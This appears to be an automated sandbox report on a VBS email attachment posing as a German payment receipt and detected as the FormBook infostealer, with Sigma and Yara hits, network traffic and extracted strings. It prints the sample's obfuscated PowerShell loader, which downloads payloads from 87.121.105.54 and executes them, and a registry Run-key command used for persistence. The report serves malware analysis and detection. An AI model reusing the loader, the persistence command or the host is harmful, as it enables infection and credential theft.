OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7948, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ProcessId: 7992, ProcessName: cmd.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
          Sigma detected: Direct Autorun Keys Modification
          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7992, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ProcessId: 8040, ProcessName: reg.exe
          Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7948, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ProcessId: 7992, ProcessName: cmd.exe
          Sigma detected: Suspicious Powershell In Registry Run Keys
          Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", ProcessId: 6712, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cva

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Yara detected FormBook
          Source: Yara matchFile source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2228792589.00000000082A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2226049542.0000000007469000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov dword ptr [ebp-000000D8h], 00000000h20_2_009C9390
          Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax20_2_009C9390
          Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov dword ptr [ebp-000000D8h], 00000000h20_2_009C9386

          Networking

          barindex
          Uses ping.exe to check the status of other devices and networks
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: global trafficHTTP traffic detected: GET /Oxaluria209.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /vKdsOriqv105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: global trafficHTTP traffic detected: GET /Oxaluria209.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /vKdsOriqv105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Cache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: google.com
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.54
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.54/Oxaluria209.smi
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.54/Oxaluria209.smiP
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
          Source: wscript.exe, 00000000.00000003.1737953396.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737292846.00000271C005F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1739297831.00000271C22D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: wscript.exe, 00000000.00000003.1691091574.00000271C22FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39d9c19692ac2
          Source: wscript.exe, 00000000.00000003.1737953396.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737292846.00000271C005F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/engKa
          Source: wscript.exe, 00000000.00000003.1691862227.00000271C2325000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691091574.00000271C22FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39d9c19692
          Source: powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98D62D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi64_7316.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi32_7560.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6871
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6871
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6871Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6871Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
